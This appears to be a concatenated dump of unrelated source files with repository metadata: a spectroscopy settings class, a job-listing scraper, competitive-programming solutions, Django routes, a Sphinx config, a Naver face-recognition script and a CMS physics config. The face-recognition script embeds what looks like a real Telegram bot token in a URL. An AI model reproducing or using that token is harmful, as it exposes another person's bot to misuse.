lines.append("apply_peak_shift : " + unicode(self.apply_peak_shift))
lines.append("reference_peak_center : " + unicode(self.reference_peak_center))
lines.append("peak_search_width : " + unicode(self.peak_search_width))
lines.append("fid_left_shift_b0 : " + unicode(self.fid_left_shift_b0))
lines.append("apply_phase0 : " + unicode(self.apply_phase0))
lines.append("phase0_range_start : " + unicode(self.phase0_range_start))
lines.append("phase0_range_end : " + unicode(self.phase0_range_end))
lines.append("fid_left_shift_phase0 : " + unicode(self.fid_left_shift_phase0))
lines.append("ref_spectrum_source : " + unicode(self.ref_spectrum_source))
lines.append("ref_peak_line_width : " + unicode(self.ref_peak_line_width))
lines.append("constant_phase0_offset : " + unicode(self.constant_phase0_offset))
# __unicode__() must return a Unicode object. In practice the code
# above always generates Unicode, but we ensure it here.
return u'\n'.join(lines)
def deflate(self, flavor=Deflate.ETREE):
if flavor == Deflate.ETREE:
e = ElementTree.Element("settings", {"version" : self.XML_VERSION})
util_xml.TextSubElement(e, "fid_left_shift", self.fid_left_shift)
util_xml.TextSubElement(e, "gaussian_apodization", self.gaussian_apodization)
util_xml.TextSubElement(e, "global_phase1", self.global_phase1)
util_xml.TextSubElement(e, "apply_peak_shift", self.apply_peak_shift)
util_xml.TextSubElement(e, "reference_peak_center", self.reference_peak_center)
util_xml.TextSubElement(e, "peak_search_width", self.peak_search_width)
util_xml.TextSubElement(e, "fid_left_shift_b0", self.fid_left_shift_b0)
util_xml.TextSubElement(e, "apply_phase0", self.apply_phase0)
util_xml.TextSubElement(e, "phase0_range_start", self.phase0_range_start)
util_xml.TextSubElement(e, "phase0_range_end", self.phase0_range_end)
util_xml.TextSubElement(e, "fid_left_shift_phase0", self.fid_left_shift_phase0)
util_xml.TextSubElement(e, "ref_spectrum_source", self.ref_spectrum_source)
util_xml.TextSubElement(e, "ref_peak_line_width", self.ref_peak_line_width)
util_xml.TextSubElement(e, "constant_phase0_offset", self.constant_phase0_offset)
return e
elif flavor == Deflate.DICTIONARY:
return self.__dict__.copy()
def inflate(self, source):
if hasattr(source, "makeelement"):
# Quacks like an ElementTree.Element
for name in ("reference_peak_center",
"gaussian_apodization",
"peak_search_width",
"global_phase1",
'phase0_range_start',
'phase0_range_end'):
item = source.findtext(name)
if item is not None:
setattr(self, name, float(item))
for name in ("fid_left_shift",
"fid_left_shift_b0",
"fid_left_shift_phase0",
"ref_peak_line_width",
"constant_phase0_offset"):
item = source.findtext(name)
if item is not None:
setattr(self, name, int(item))
for name in ("apply_peak_shift",
"apply_phase0", ):
item = source.findtext(name)
if item is not None:
setattr(self, name, util_xml.BOOLEANS[item])
for name in ("ref_spectrum_source",):
item = source.findtext(name)
if item is not None:
setattr(self, name, item)
elif hasattr(source, "keys"):
# Quacks like a dict
for key in source.keys():
if hasattr(self, key):
setattr(self, key, source[key])
class BlockPrepMegalaser(block_prep_identity.BlockPrepIdentity):
"""
This is a building block object that can be used to create a list of
processing blocks.
This object represents preprocessing of the raw data from the first
block ('raw') in the dataset.blocks list.
We sub-class from BlockPrepIdentity base class to minimize recreating
wheels, but to also leave us the flexibility of extending this class
in the future for any 'special children' types of data loading.
In here we also package all the functionality needed to save and recall
these values to/from an XML node.
"""
# The XML_VERSION enables us to change the XML output format in the future
XML_VERSION = "1.0.0"
def __init__(self, attributes=None):
"""
Here we set up the standard functionality of the base class
"""
block_prep_identity.BlockPrepIdentity.__init__(self, attributes)
#----------------------------------------
# processing parameters
self.set = _Settings()
#----------------------------------------
# results storage
self.frequency_shift = None
self.phase_0 = None
self.data = None
if attributes is not None:
self.inflate(attributes)
self.chain = None
##### Standard Methods and Properties #####################################
# # This overrides the data property from the Identity class which is read
# # only. This form allows us to read/write
# def __get_data(self):
# return self._data
# def __set_data(self, data):
# self._data = data
# data = property(__get_data, __set_data)
@property
def dims(self):
"""Data dimensions in a list, e.g. [1024, 1, 1, 1]. It's read only."""
# Note that self.data.shape is a tuple. Dims must be a list.
if self.data is not None:
return list(self.data.shape[::-1])
return None
def __str__(self):
return self.__unicode__().encode("utf-8")
def __unicode__(self):
lines = mrs_data_raw.DataRaw.__unicode__(self).split('\n')
lines[0] = "----------- DataPrepMegalaser Object ------------"
lines.append("Data shape : %s" % str(self.dims))
return u'\n'.join(lines)
def create_chain(self, dataset):
self.chain = chain_prep_megalaser.ChainPrepMegalaser(dataset, self)
def set_dims(self, dataset):
"""
Given a Dataset object, this is an opportunity for this block object
to ensure that its dims match those of the parent dataset.
"""
block.Block.set_dims(self, dataset)
# local reference to input data
raw = dataset.get_source_data('prep')
# this is the calculated proper size for self.data
fidsum_dims = [raw.shape[-1],1,1,1]
if not self.dims or self.dims != fidsum_dims:
self._reset_dimensional_data(dataset)
def _reset_dimensional_data(self, dataset):
"""
Resets (to zero) and resizes dimensionally-dependent data
"""
# local reference to input data
raw = dataset.get_source_data('prep')
n_fids = raw.shape[-2]
self.frequency_shift = np.zeros([n_fids])
self.phase_0 = np.zeros([n_fids])
self.data = np.zeros((1,1,1,raw.shape[-1]), dtype=raw.dtype)
if self.chain is not None:
self.chain.reset_results_arrays()
def concatenate(self, new):
raise NotImplementedError
def deflate(self, flavor=Deflate.ETREE):
if flavor == Deflate.ETREE:
e = ElementTree.Element("block_prep_megalaser",
{ "id" : self.id,
"version" : self.XML_VERSION})
util_xml.TextSubElement(e, "behave_as_preset", self.behave_as_preset)
# Now I deflate the attribs that are specific to this class
e.append(self.set.deflate())
if not self.behave_as_preset:
e.append(util_xml.numpy_array_to_element(self.frequency_shift,'frequency_shift'))
e.append(util_xml.numpy_array_to_element(self.phase_0,'phase_0'))
e.append(util_xml.numpy_array_to_element(self.data, 'data'))
return e
elif flavor == Deflate.DICTIONARY:
return self.__dict__.copy()
def inflate(self, source):
if hasattr(source, "makeelement"):
val = source.findtext("behave_as_preset") # default is False
if val is not None:
self.behave_as_preset = util_xml.BOOLEANS[val]
# Quacks like an ElementTree.Element
self.set = _Settings(source.find("settings"))
if not self.behave_as_preset:
# Now I inflate the attribs that are specific to this class
temp = source.find("frequency_shift")
self.frequency_shift = util_xml.element_to_numpy_array(temp)
temp = source.find("phase_0")
self.phase_0 = util_xml.element_to_numpy_array(temp)
temp = source.find("data")
self.data = util_xml.element_to_numpy_array(temp)
elif hasattr(source, "keys"):
# Quacks like a dict
for key in source.keys():
if key == "set":
setattr(self, key, source[key])
##### Private Methods #####################################
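# Illustrative usage sketch (assumed, not taken from the original module): the
# settings round-trip through XML roughly as
#
#     settings = _Settings()
#     node = settings.deflate()        # ElementTree element tagged 'settings'
#     restored = _Settings(node)       # __init__ calls inflate() on the element
#
# BlockPrepMegalaser.deflate() nests that element, together with the
# frequency_shift / phase_0 / data arrays, inside a 'block_prep_megalaser'
# element.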
| [
"[email protected]"
]
| |
9330cd3f6095c574c0fa566a8d69be0fec19b834 | a62a87ad976e3d35ea7879671190faf950ebaf3b | /scrapys/t.py | 47ae7f7a675a471d9db25b8bb6a431b20fa33406 | []
| no_license | YangXiaoo/Django-web | 144c8c1800d2a67bf8d1d203210aa351d31e8fb3 | 97903f309234fd1421a19a52a083f214172d6c79 | refs/heads/master | 2020-03-24T11:29:20.296017 | 2019-01-20T14:54:16 | 2019-01-20T14:54:16 | 142,687,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,264 | py | # -*- coding: utf-8 -*-
import re
import urllib2
import pandas as pd
# Fetch the raw page source (HTML)
def get_content(page):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
url ='http://search.51job.com/list/000000,000000,0000,00,9,99,python,2,'+ str(page)+'.html'
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
    decoded = unicode(html, "gbk").encode("utf8")
    return decoded
def get(html):
reg = re.compile(r'class="t1 ">.*? href="(.*?)".*? <a target="_blank" title="(.*?)".*? <span class="t2"><a target="_blank" title="(.*?)" href="(.*?)".*?<span class="t3">(.*?)</span>.*?<span class="t4">(.*?)</span>.*? <span class="t5">(.*?)</span>',re.S)
items=re.findall(reg,html)
return items
def info_get(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
html = unicode(html, "gbk").encode("utf8")
reg = re.compile(r'<span class="sp4"><em class="(.*?)"></em>(.*?)</span>',re.S)
based_info = re.findall(reg,html)
reg_p = re.compile(r'<span class="el">(.*?)</span>',re.S)
kind = re.findall(reg_p,html)
return based_info,kind
def address(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
html = unicode(html, "gbk").encode("utf8")
reg_a = re.compile(r'<div class="tBorderTop_box bmsg">.*?</span>(.*?)</p>',re.S)
address = re.findall(reg_a,html)
return address
final = []
for j in range(1,2):
print("正在爬取第"+str(j)+"页数据...")
try:
html=get_content(j)
for i in get(html):
result = {}
with open ('51job.txt','a') as f:
f.write(i[0]+'\t'+i[1]+'\t'+i[2]+'\t'+i[3]+'\t'+i[4]+'\t'+i[5]+'\t'+i[6]+'\n')
f.close()
result['info_link'] = i[0]
info,kind = info_get(i[0])
count = 1
for n in info:
if count == 1:
result['experience'] = n[1]
count += 1
elif count == 2:
result['educational'] = n[1]
count += 1
else:
break
result['work_type'] = kind[0]
result['name'] = i[1]
result['company'] = i[2]
result['company_link'] = i[3]
result['work_place'] = i[4]
result['salary'] = i[5]
ad = address(i[3])
result['address'] = ad
result['publish_time'] = i[6]
final.append(result)
except:
pass
df = pd.DataFrame(final)
df.to_csv('51job-data_analysis.csv', mode = 'a',encoding = 'utf8')
| [
"[email protected]"
]
| |
91cf1bbafb30679fda22289ccab052d7605c72e6 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /typical90/typical90_cf.py | f610d0f1035ed452bc7992ce2b7ed0d6160b139f | []
| no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 937 | py | # https://atcoder.jp/contests/typical90/tasks/typical90_cf
# # def input(): return sys.stdin.readline().rstrip()
# # input = sys.stdin.readline
# from numba import njit
# from functools import lru_cache
# import sys
# input = sys.stdin.buffer.readline
# sys.setrecursionlimit(10 ** 7)
N = int(input())
S = input()
ans = 0
last = [-1]*2
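# For each right endpoint i, every left endpoint up to min(last 'o', last 'x')
# gives a substring that contains both characters, so add that count.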
for i in range(N):
if S[i]=='o':
last[0] = i
else:
last[1] = i
if last[0]==-1 or last[1]==-1:
continue
ans += min(last[0], last[1]) + 1
# print(ans, last)
print(ans)
# S = input()
# n = int(input())
# N, K = map(int, input().split())
# l = list(map(int, (input().split())))
# A = [[int(i) for i in input().split()] for _ in range(N)]
# import sys
# it = map(int, sys.stdin.buffer.read().split())
# N = next(it)
# @njit('(i8,i8[::1],i4[::1])', cache=True)
# def main():
# @lru_cache(None)
# def dfs():
# return
# return
# main()
| [
"[email protected]"
]
| |
b9edcccc00c10227f91be8740e4d744c0cea4347 | 2b8047e9e73a2f6fd43897cff19cb7e7c7c464d4 | /docssrc/source/conf.py | 5d48fbeb3fa4a5a1f8afc2bbac54d3f8fcfb3638 | [
"MIT"
]
| permissive | Peilonrayz/envee | 548fe08330a3b43bee5da1d64a0e406c781b990e | 66f5b6b1ff7f5966be794e1e3878418c560c1f65 | refs/heads/master | 2021-01-09T13:35:40.946529 | 2020-02-21T20:58:27 | 2020-02-21T20:58:27 | 242,321,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | import datetime
import pathlib
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
FILE_PATH = pathlib.Path(__file__).absolute()
# Add documentation for tests
TLD = FILE_PATH.parent.parent.parent
sys.path.insert(0, str(TLD))
config = configparser.ConfigParser()
config.read(TLD / "setup.cfg")
project = "envee"
author = "Peilonrayz"
copyright = f"{datetime.datetime.now().year}, {author}"
release = config.get("src", "version")
master_doc = "index"
templates_path = ["_templates"]
exclude_patterns = []
doctest_global_setup = f"""
import {project}
"""
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.graphviz",
"sphinx.ext.githubpages",
"sphinx.ext.intersphinx",
"sphinx_autodoc_typehints",
"sphinx_rtd_theme",
]
intersphinx_mapping = {"python": ("https://docs.python.org/3", None)}
html_theme = "sphinx_rtd_theme"
html_static_path = ["_static"]
set_type_checking_flag = True
| [
"[email protected]"
]
| |
737f03f10ca5c122cad3e6ecd1ea3ca167ba591a | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_7114.py | 43772d7ec5384a7033d876749b4875f9abf3a978 | []
| no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | # global name 'find' is not defined
'python'.find('y') # gives 1
| [
"[email protected]"
]
| |
fbdea07de6f18420b99a57b116c79adf1f0463a1 | eac52a8ae7c539acedaedf8744bd8e20172f0af6 | /general/decode_ways.py | 33c70cc775b271c21d0bb448684acae24e9ffa65 | []
| no_license | mshekhar/random-algs | 3a0a0f6e6b21f6a59ed5e1970b7a2bc2044e191f | 7c9a8455f49027a754038b23aaa2df61fe5397ca | refs/heads/master | 2020-03-26T16:29:42.694785 | 2019-07-18T20:57:55 | 2019-07-18T20:57:55 | 145,105,593 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,895 | py | # A message containing letters from A-Z is being encoded to numbers using the following mapping:
#
# 'A' -> 1
# 'B' -> 2
# ...
# 'Z' -> 26
# Given a non-empty string containing only digits, determine the total number of ways to decode it.
#
# Example 1:
#
# Input: "12"
# Output: 2
# Explanation: It could be decoded as "AB" (1 2) or "L" (12).
# Example 2:
#
# Input: "226"
# Output: 3
# Explanation: It could be decoded as "BZ" (2 26), "VF" (22 6), or "BBF" (2 2 6).
# if not single_digit:
# all_single_possible[c] = False
# else:
# all_single_possible[c] = all_single_possible[c - 1] and all_single_possible[c]
# if c - 1 >= 0 and num_decodings[c - 1] > 0:
# num_decodings[c] = num_decodings[c - 1]
#
# if c - 1 >= 0:
# double_digit = self.get_decoding_count(s[c - 1] + i)
# if double_digit:
# print s[c - 1] + i, double_digit, num_decodings[c - 2] + int(all_single_possible[c - 2])
# if c - 2 >= 0 and num_decodings[c - 2] + int(all_single_possible[c - 2]) > 0:
# num_decodings[c] += num_decodings[c - 2] + 1
# elif c == 1:
# num_decodings[c] += 1
class Solution(object):
def get_decoding_count(self, s):
if not s.startswith('0') and 1 <= int(s) <= 26:
return 1
return 0
def numDecodings(self, s):
"""
:type s: str
:rtype: int
"""
num_decodings = [0] * len(s)
all_single_possible = True
for c, i in enumerate(s):
single_digit = self.get_decoding_count(i)
double_digit = 0
if c - 1 >= 0:
double_digit = self.get_decoding_count(s[c - 1] + i)
if not single_digit:
all_single_possible = False
if single_digit + double_digit > 0:
if single_digit:
num_decodings[c] = num_decodings[c - 1]
if all_single_possible and not num_decodings[c]:
num_decodings[c] = 1
if double_digit:
if c - 2 >= 0 and num_decodings[c - 2] > 0:
num_decodings[c] += num_decodings[c - 2]
elif c == 1:
num_decodings[c] += 1
# add one for all single decodings
# print num_decodings, all_single_possible
return num_decodings[-1]
print Solution().numDecodings("12"), 2
print Solution().numDecodings("226"), 3
print Solution().numDecodings("10"), 1
print Solution().numDecodings("103"), 1
print Solution().numDecodings("1032"), 1
print Solution().numDecodings("10323"), 1
print Solution().numDecodings("012"), 0
print Solution().numDecodings("110"), 1
print Solution().numDecodings("1212"), 5
# 1 2 1
# 12 1
# 1 21
#
# 1 2 1 2
#
# 12 1 2
# 12 12
#
# 1 21 2
# 1 2 12
# for i in ["0", "10", "10", "103", "1032", "10323"]:
# print(Solution().numDecodings(i))
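# A compact reference version of the same counting recurrence (illustrative
# sketch added alongside the original class-based solution above):
def num_decodings_reference(s):
    # prev / curr hold the number of decodings of s[:i-1] and s[:i]
    if not s or s[0] == '0':
        return 0
    prev, curr = 1, 1
    for i in range(1, len(s)):
        nxt = curr if s[i] != '0' else 0
        if 10 <= int(s[i - 1:i + 1]) <= 26:
            nxt += prev
        prev, curr = curr, nxt
    return curr
print Solution().numDecodings("1212"), num_decodings_reference("1212")  # both give 5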
| [
"[email protected]"
]
| |
07a345dba33878564304037a609dba06de767c0c | 36c00fe2afff4818c937e312ce0c6a79f35e2a77 | /7-kyu/happy-birthday,-darling!/python/solution.py | ab407ea9bcebd79b2d18c37ed24e86ac2368a137 | []
| no_license | p-lots/codewars | 0a67b6ee4c91180ff78c648421b9d2d64463ddc3 | 535faeee475c6b398124d6f5002b0e111406e8bb | refs/heads/master | 2023-08-23T22:14:33.635011 | 2023-08-23T13:30:37 | 2023-08-23T13:30:37 | 195,320,309 | 0 | 0 | null | 2023-05-09T19:25:50 | 2019-07-05T01:40:15 | Python | UTF-8 | Python | false | false | 164 | py | def womens_age(n):
base = n // 2 if n % 2 == 0 else (n - 1) // 2
new_n = 20 if n % 2 == 0 else 21
return f"{n}? That's just {new_n}, in base {base}!" | [
"[email protected]"
]
| |
d0c7805015d0990484841901a310a10805e00cf6 | 39be02fe4f8e8362a7acc005f3e30dd6fe47990e | /newdata/oylereader.py | 5ebdae4fcc852f8c821d74ed40ee95c9b06e915b | []
| no_license | seferlab/geneexpress | e2f6fdaa49e40cd48d0572cd9ddb5d2f45566adb | ac35bde5ba52d24981ece74e532f46bbfff9019e | refs/heads/master | 2022-12-19T08:33:16.925160 | 2020-09-29T13:51:30 | 2020-09-29T13:51:30 | 299,619,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import os
import sys
import math
fname1 = "127 LCM time course Data Not normalized.txt"
fname2 = "127 LCM time course Quantile Normalized logbased 2 transformed.txt"
with open(fname1,"r") as infile:
for line in infile:
line = line.rstrip()
vals = line.split("\r")
splitted = vals[1].split("\t")
items1 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
with open(fname2,"r") as infile:
for line in infile:
line = line.rstrip()
vals = line.split("\r")
splitted = vals[1].split("\t")
items2 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
print items1[0:20]
print [math.log(titem,2.0) for titem in items1[0:10]]
print [math.log(titem+1.0,2.0) for titem in items1[0:10]]
print items2[0:20]
print items1[8:20]
| [
"[email protected]"
]
| |
f0b3e6949b78c44d35bdedc65dcdd7d848eae7f3 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/CodeJamData/10/33/17.py | b549582d467c3879831e6f099d36ecf18d3abe31 | []
| no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,617 | py | from itertools import count
def board(rows):
n = len(rows[0]) * 4
return [map(int, '{0:0{1}b}'.format(int(row, 16), n)) for row in rows]
def squares(board):
m, n = len(board), len(board[0])
#sq = {}
for r in xrange(m):
for c in xrange(n):
if board[r][c] == 2: continue
ns = findsquare(board, r, c)
yield ns, -r, -c
#fill(board, r, c, ns)
#sq[ns] = sq.get(ns, 0) + 1
#return sq
def solve(board):
result = {}
m, n = len(board), len(board[0])
while 1:
try:
n, r, c = max(squares(board))
except ValueError:
return result
result[n] = result.get(n, 0) + 1
fill(board, -r, -c, n)
def fill(board, r, c, n):
for i in xrange(r, r+n):
for j in xrange(c, c+n):
board[i][j] = 2
def findsquare(board, r, c):
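    # Starting at (r, c), grow the square side s while the newly added bottom
    # row and right-hand column continue the alternating chessboard pattern;
    # the first mismatch returns s, as does an IndexError at the board edge.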
x = board[r][c]
try:
for s in count(1):
for j in range(c, c+s+1):
x = 1 - x
if board[r+s][j] != x:
return s
for i in range(r+s-1, r-1, -1):
x = 1 - x
if board[i][c+s] != x:
return s
except IndexError:
return s
if __name__ == '__main__':
import sys
rl = iter(sys.stdin).next
for case in range(1, int(rl())+1):
M,N = map(int, rl().split())
lines = [rl().strip() for _ in range(M)]
b = board(lines)
sq = solve(b)
print 'Case #%d: %s' % (case, len(sq))
for k, v in sorted(sq.items(), reverse=True):
print k,v
| [
"[email protected]"
]
| |
238eb7c3a48a487377b765829fcb5eee86416ff5 | 24cf311c53c29e4e332cea01ee4de8196253a7b7 | /accounts/urls.py | ca8992d712669175ee1ef3193b0ea2d6ab348261 | []
| no_license | apengok/vsicravdoa | d017fe0c6a8606ef7bb74739354de1a2767b2a8a | e424b94007731189c2f14513798f2a9e9a45ba4c | refs/heads/master | 2020-03-10T23:07:48.145583 | 2018-06-01T09:18:25 | 2018-06-01T09:18:25 | 129,634,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | from django.conf.urls import url
from .views import (
AccountHomeView,
# AccountEmailActivateView,
UserDetailUpdateView
)
app_name = 'account'
urlpatterns = [
url(r'^$', AccountHomeView.as_view(), name='home'),
url(r'^details/$', UserDetailUpdateView.as_view(), name='user-update'),
# url(r'history/products/$', UserProductHistoryView.as_view(), name='user-product-history'),
# url(r'^email/confirm/(?P<key>[0-9A-Za-z]+)/$',
# AccountEmailActivateView.as_view(),
# name='email-activate'),
# url(r'^email/resend-activation/$',
# AccountEmailActivateView.as_view(),
# name='resend-activation'),
]
# account/email/confirm/asdfads/ -> activation view | [
"[email protected]"
]
| |
a20abcac99856f482d5e3f7ec4d5c5c93878dacd | 98f505e8275ed888818d8d6f77d27a9c275b55d8 | /face.py | a6d86359d258eda63f01fe71ba8a00892e28e706 | []
| no_license | EHwooKim/telegram | 13ac0afbd4ee5f91aa81b557183e9d8143fb1315 | 034ae64fa6283720fd55362b1b763cb3497ce4fc | refs/heads/master | 2022-12-11T19:53:23.942523 | 2019-07-12T07:41:29 | 2019-07-12T07:41:29 | 196,533,974 | 0 | 0 | null | 2022-12-08T05:52:25 | 2019-07-12T07:48:30 | Python | UTF-8 | Python | false | false | 959 | py | import pprint
import requests
from decouple import config
# 0. Image file
file_url = 'https://api.telegram.org/file/bot823224197:AAFwM03Ie4P8dBH45aKI75sMO0okZpcIqic/photos/file_2.jpg'
response = requests.get(file_url, stream=True)
image = response.raw.read()
# 1. Naver API credentials
naver_client_id = config('NAVER_CLIENT_ID')
naver_client_secret = config('NAVER_CLIENT_SECRET')
# 2. API endpoint URL
naver_url = 'https://openapi.naver.com/v1/vision/celebrity'
# 3. Send the request (POST)
headers = {
'X-Naver-Client-Id': naver_client_id,
'X-Naver-Client-Secret': naver_client_secret
}
response = requests.post(naver_url,
headers=headers,
files={'image':image}).json()
best = response.get('faces')[0].get('celebrity')
if best.get('confidence') > 0.2:
text = f"{best.get('confidence')*100}%만큼 {best.get('value')}를 닮으셨네요~"
else :
text = '사람이 아닙니다'
print(text) | [
"[email protected]"
]
| |
52860b1da6917fcd830a4b178bd3d28e8c60bf70 | 99dfd25f07b748e0b9b04ac300e135dc20570e1c | /cart/urls.py | 1731b6a31f6bbea06b4fcbb367549265a3127dd2 | []
| no_license | suipingooi/tgc10-django-deploy-checkpointPAUL | 1ec45e7135263703ff3472216f8fdcfdb379d7f3 | 46b62cdce8396c2b0cc57ec1fca4e77c0eee1e1a | refs/heads/master | 2023-04-16T05:11:20.535480 | 2021-04-14T12:02:43 | 2021-04-14T12:02:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | from django.urls import path
import cart.views
urlpatterns = [
path('add/<book_id>', cart.views.add_to_cart,
name="add_to_cart"),
path('', cart.views.view_cart, name='view_cart'),
path('remove/<book_id>', cart.views.remove_from_cart,
name="remove_from_cart"),
path('update_quantity/<book_id>', cart.views.update_quantity,
name="update_cart_quantity")
]
| [
"[email protected]"
]
| |
034a7d5e99bd493a04228ed2e4b4f1b71a6ec5c2 | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | df940020d4066a6dc89ae87f2652df920ed8c8b4 | []
| no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | pyi | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | [
"[email protected]"
]
| |
bd13eec195727b03591f3658eaa75c0f54f16624 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03827/s915868982.py | 561cb7cb4a15cc5878feaba7bc58f0a5af14916d | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | N = int(input())
S = input()
x = 0
ans = 0
for s in S:
x += 1 if s == "I" else -1
ans = max(ans, x)
print(ans) | [
"[email protected]"
]
| |
2ca6a41f705f6ef795834db9d2bcbec1c4e7da99 | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/miniAODJobs600toInf/nano4.py | 1366df4f33cc6ad0c152e7cd8e25ea82efda4cf6 | []
| no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,363 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --mc --eventcontent NANOAODSIM --datatier NANOAODSIM --no_exec --conditions 102X_upgrade2018_realistic_v19 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein file:cms/xaastorage/MINIAOD/Xaa_photons/diPhoton/x500_a100/XaaNLOttQED0_BBAR_M-x500_a100_MINIAODSIM_1.root --fileout file:jetToolbox_nano_mc.root
import FWCore.ParameterSet.Config as cms
import files50
from files50 import *
from Configuration.StandardSequences.Eras import eras
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring('file:/cms/xaastorage/MINIAOD/2016/GJets/HT_100to200/GJet_100to200_1.root '),
fileNames = cms.untracked.vstring(A),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.NANOAODSIMoutput = cms.OutputModule("NanoAODOutputModule",
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('NANOAODSIM'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:jetToolbox_nano_mc_2018GJetsHT600toInf_50.root'),
outputCommands = process.NANOAODSIMEventContent.outputCommands
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_upgrade2018_realistic_v19', '')
# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequenceMC)
process.endjob_step = cms.EndPath(process.endOfProcess)
